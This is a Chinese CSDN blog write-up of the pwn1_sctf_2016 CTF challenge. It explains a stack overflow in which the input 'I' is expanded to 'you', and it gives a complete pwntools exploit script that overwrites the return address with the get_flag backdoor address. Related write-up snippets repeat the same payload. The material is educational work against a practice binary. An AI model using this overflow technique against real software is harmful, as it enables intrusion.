pwn1_sctf_2016

最新推荐文章于 2024-03-27 16:20:09 发布

Mokapeng

最新推荐文章于 2024-03-27 16:20:09 发布

阅读量250

点赞数 1

分类专栏： PWN CTF训练文章标签： PWN linux

本文链接：https://blog.csdn.net/qq_41696518/article/details/125764850

版权

CTF训练同时被 2 个专栏收录

46 篇文章 15 订阅

订阅专栏

PWN

37 篇文章 3 订阅

订阅专栏

pwn1_sctf_2016

- 题目分析
- 完整代码

题目分析

在这里插入图片描述
仅仅栈不可执行
放入ida，发现漏洞函数，并发现后门get_flag()函数，因此该题就是通过栈溢出执行get_flag,分析溢出字符大小：

fget函数限制输入32位，但s存在60位空间，因此不能直接进行溢出
但后面分析下面程序会将输入的"I"换成"you"
先动态调试查看要溢出的总大小
在这里插入图片描述
溢出大小0x138-0x0fc + 4 = 64
因此输入20个I,在输入4个垃圾数据即可

完整代码

from pwn import *
io = process("./pwn1_sctf_2016")
flag_addr = 0x08048F0D
payload = b'I'*20+b'A'*4+ p32(flag_addr)
io.send(payload)
io.interactive()

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Mokapeng

关注关注

1
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

日行一pwn：pwn1_sctf_2016

m0_57221101的博客

05-13

601

用俩图床，有的有水印，有的没水印，折磨距离上一次日行一pwn已经快一个月了，干脆改成月行一pwn吧（汗。这段时间去恶补了王爽老师的汇编语言。结果一回来就做了这么一道题，函数封装的严严实实，打眼一看全是C++。想入门pwn这么难吗。正片 BUUCTF在线评测使用BUUCTF靶场，首先标准步骤下载--放到kali里面查--拖到windows用ida反汇编发现只有一个NX保护 NX保护就是CPU不会执行放在内存段中的代码，也就是我们之前在BOF中学习的像内存中写入Shell的方法

BUUCTF-pwn2_sctf_2016

weixin_44145820的博客

03-06

998

这题利用的是负数转无符号数造成缓冲区溢出，以及泄露libc基地址执行ROP 题目分析由于NX开启，我们考虑使用ROP，Canary没有打开使得这题变得很方便下面是vuln函数：在该函数中，程序读入一个字符串并转化为带符号整形（signed int），这时，如果我们输入负数可以避开不能大于32的检查在get_n函数中，读入长度被强制转换为unsigned int，此时-1变成了42949...

参与评论您还未登录，请先登录后发表或查看评论

BUUCTF pwn1_sctf_2016

CHAWUCIREN1的博客

04-08

3433

执行一下似乎出现第一个i被替换成you 检查一下保护机制丢到ida里面输入的变量s大小为0x3c，但是我们看fgets里面，我们只能输入32个字符，没法进行溢出，我们在输入的时候，会发现i会被替换成you，所以我们可以利用20个i来填充，找到shell，地址为0x8048F0D 返回地址再随便填四个字符我们可以构造一下payload payload = ‘I’*20 + p64(0x8048F0D) 这里特别注意一下 payload可以有多种写法 ‘I’ *19 + ‘A’*7 + p

BUUCTF Pwn pwn1_sctf_2016

MrTreebook的博客

12-05

1317

BUUCTF Pwn pwn1_sctf_20161.题目下载地址2.checksec检查保护3.IDA分析4.看一下栈大小5.找到后门函数地址6.exp 1.题目下载地址点击下载题目 2.checksec检查保护运行一下看看 3.IDA分析看一下伪代码 int vuln() { const char *v0; // eax char s[32]; // [esp+1Ch] [ebp-3Ch] BYREF char v3[4]; // [esp+3Ch] [ebp-1Ch] BYREF

BUUCTF pwn pwn2_sctf_2016

菜的只能随便写写博客

02-18

2516

0x01 分析 0x02 运行程序读入一个长度，然后按照长度读入后面输入的data并回显。 0x03 IDA 数据长度被限制为32，无法溢出，接着查看get_n函数。接受a2个长度的字符串并放到vuln函数的缓冲区内部，但是a2传入的值类型是unsigned int，而前面判断长度的类型是int，可以规避长度限制。 0x04 思路输入负数长度，绕过长度检查，执行r...

CTF-PWN-buuctf-pwn1_sctf_2016-CPP的字符串替换

serfend's blog

04-14

496

CTF-PWN 来源：https://buuoj.cn/challenges 内容：附件：https://pan.baidu.com/s/1bSrSQZYWkBIWCXP5Lsq7sg?pwd=mpgo 提取码：mpgo 答案：flag{714a8f91-7e24-440c-8cc6-1f2d26adbcec} 总体思路发现get_flag的位置发现输入会被替换，构造exp 详细步骤查看文件信息查看题目发现是将用户输入的I替换为you，虽然输入的时候只允许输入32位，但是因为替换

pwn——ciscn_2019_n_1#pwn1_sctf_2016#jarvisoj_level0

LSYZWF的博客

10-26

604

文章目录ciscn_2019_n_1题目解答 ciscn_2019_n_1 题目题目链接：https://buuoj.cn/challenges#ciscn_2019_n_1 解答 1、打开IDA进行分析发现函数gets和系统命令cat 此函数的大致意思是输入v1的值，然后判断v2，故存在栈溢出使得v2的内存中的值为11.28125 2、判断偏移地址 v2的内存地址距离v1首地址的偏移量是30h-04h=2ch 3、gdb调试一波没有堆栈溢出保护 4、编写脚本 11.28125的十六进制可以在I

pwn1_sctf_20161

m0_74091653的博客

09-25

257

函数相对安全，因为它可以限制读取的字符数，防止缓冲区溢出。但是可以发现会将输入的 I 换成 you。发现fgetsg函数溢出0x3c。指向的字符数组中，直到遇到换行符。也就是我们可以用20个 I 来溢出。也找出了cat flag.txt。中读取字符，并将其存储在。这里我们正常溢出是不行的。

[BUUCTF-pwn]——pwn1_sctf_2016

Y_peak的博客

01-30

910

[BUUCTF-pwn]——pwn1_sctf_2016 题目地址：https://buuoj.cn/challenges#pwn1_sctf_2016 题目：话不多说，先下载下来再说。在Linux上 checksec一下，发现开启了NX保护，但是没有开启Stack的保护，也就是说我们可以很轻易的利用栈溢出。在window的IDA上反汇编看下源码，额，main函数没有什么有用的信息。我们可以看下vuln函数。发现好大一堆，发现了fgets函数，但是很遗憾。它要求我们只能输入不超过32个字符。

buuctf之pwn1_sctf_2016

最新发布

weixin_54452942的博客

03-27

704

简单易懂~

buu的pwn1_sctf_2016

xieyichensss的博客

03-18

751

**（学生党太菜了）** pwn_sctf_2016 1.拿到文件，首先checksec并file一下。发现NX打开了，哦糟糕.不过不慌，我们下一步打开IDA看一哈 2.用32位的IDA打开他，反汇编一下。双击vuln（）函数。得到这一大堆我看不懂的东西，不过我看到最后有strcpy函数，知道是一个栈溢出的问题。s的大小为0h3c，且函数中出现I和you，着重分析他俩（经过一系列的百度）。得到最后是用you代替I，这样输入20个I就可以溢出到ebp了。 3.我又在全部函数中找啊找，发现...

PWN (3) pwn1_sctf_2016 1

brightendavid的博客

05-11

477

查找字符串，发现了一个flag.txt。输入在这里限制为32长度的输入

BUUCTF刷题之路-pwn1_sctf_20161

qq_30528603的博客

05-27

472

从我们的运行结果看，会把用户输入的I换成you。那就是说会自动帮我们把1字节变3字节，我们可以利用填充I来让程序自动填充到返回地址前。s距离ebp是0x3c也就是60个字节，那么我们填充20个I再加4个字节填充接着拼接我们的后门地址。但是新的问题产生了，fgets函数较gets函数安全一点，他有长度限制，我们看到s离ebp的距离有0x3c那么远，但是fgets只能输入32个字节，只通过fgets溢出覆盖不到返回地址。看到有个fgets函数，并且限制长度为32。这是一个32位的程序，只开启了NX保护。

BUU-pwn1_sctf_2016

qq_45771413的博客

04-27

349

今天补牙，帮学弟改大创，以前的题目还没来得及整理，先补票buu部分的入门pwn题ಥ_ಥ 查看保护 IDA 说来惭愧，太久没做C++写的题现在快看不懂了……只能看出来提示输入，有个I和you的处理，然后将变换拷贝回输入变量，输出寻找敏感调用：在字符串查找里找到了全家桶：解题这里因为不知道中间咋处理的，直接莽，想溢出s。但是发现s虽然要求输入32，但是栈空间有3C（60位），显然无法溢出。想通过v0搞事情，发现v0是char，而且是地址，显然无法利用……预计关键就在中间的那一串看不懂的了。在一堆

./pwn1_sctf_2016: error while loading shared libraries: libstdc++.so.6: cannot open shared object file: No such file or directory

09-02

这个错误通常发生在缺少 libstdc++.so.6 库文件时。解决这个问题的方法是安装 libstdc++ 库。你可以尝试使用以下命令来安装它：对于 Ubuntu 或 Debian 系统： ``` sudo apt-get install libstdc++6 ``` 对于 CentOS 或 RHEL 系统： ``` sudo yum install libstdc++.so.6 ``` 请注意，根据你使用的操作系统和软件包管理器，命令可能会有所不同。确保你的系统上已经安装了适当的软件包管理器，并根据你的情况进行相应的调整。如果问题仍然存在，请提供更多的上下文信息，以便我可以提供更具体的解决方案。